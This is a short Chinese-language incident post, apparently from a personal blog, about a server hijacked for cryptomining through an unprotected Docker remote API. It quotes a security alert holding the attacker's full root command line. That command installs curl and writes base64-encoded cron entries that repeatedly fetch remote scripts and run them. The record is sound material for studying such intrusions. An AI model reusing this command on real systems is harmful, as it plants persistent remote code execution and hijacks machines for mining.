记录一次服务器因打开Docker允许远程登陆而不添加任何防护而被挖矿的经历

可疑编码命令 可疑

发生时间：2024-12-06 23:04:56 IP：8.138.181.*** 172.30.154.***

告警描述：检测模型发现您的服务器上执行的进程命令行高度可疑，很有可能与木马、病毒、黑客行为有关。

异常事件详情 数据来源： 进程启动触发检测

告警原因：该命令行存在高度可疑的编码特征。

用户名：root

命令行：chroot /mnt/ /bin/sh -c if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y –reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/crontab && echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/cron.d/zzh && echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d >>/etc/crontab

进程路径：/bin/busybox